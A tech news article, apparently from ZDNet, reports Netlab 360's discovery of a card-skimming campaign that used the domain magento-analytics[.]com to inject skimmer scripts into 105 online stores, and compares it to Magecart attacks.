Researchers expose mass credit card stealing campaign

Over 100 websites including top Alexa domains are infected.

Inside Verizon's 2019 Data Breach Investigations report ZDNet's Larry Dignan tells TechRepublic's Karen Roby that the contents of Verizon's 2019 Data breach Investigations report finds that nation states and espionage are becoming a worry for businesses. Read more: https://zd.net/2WtkXFN

A new credit card skimming scheme which involves over 100 websites is actively stealing the financial details of customers, researchers have warned.

According to Netlab 360, credit card information including names, card numbers, expiration dates, and security codes (CVV) have been stolen over the course of five months.

A suspicious domain, magento-analytics[.]com, was flagged by the company back in October 2018. Since then, Netlab 360 has been tracking the domain, of which traffic rates were originally rather low.

The domain, which is not associated with legitimate Magento services or websites, returns a 404 error if you attempt to access it directly from a browser. 

However, it was not long before the researchers realized something nefarious was going on.  

CNET: Singapore parliament passes controversial fake news bill

Magento-analytics[.]com is registered in Panama, but recently shifted to the US, Russia, and then finally China. This prompted the team to check out what the domain's purpose was, and they found a range of JS scripts used to skim financial data.

The scripts themselves are similar and appear to be simple, containing little more than a timer, TrySend functions to fetch credit card information, and a SendData call for reporting the data to the operator's command-and-control (C2) server.

screenshot-2019-05-09-at-10-00-36.png

Netlab 360

See also: DeepDotWeb Dark web resource dies with FBI seizure

Netlab 360 tracked these scripts and discovered that 105 domains have been injected with these malicious scripts, including six among the Alexa Top one million websites.

Victims appear to be e-commerce and retail websites including those which sell goods such as designer bags, bicycles, baby products, electronics, and wine. 

TechRepublic: Today's most innovative enterprise solutions

The campaign is reminiscent of Magecart, a well-known cybercriminal group which has been connected to credit card skimming attacks against high-profile targets including British Airways, TicketMaster, and OXO International

Last week, Trend Micro said the hacking group had managed to implant credit card stealing malware in 201 online stores linked to 176 colleges and universities in the US, as well as 21 academic institutions in Canada.

Previous and related coverage


Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0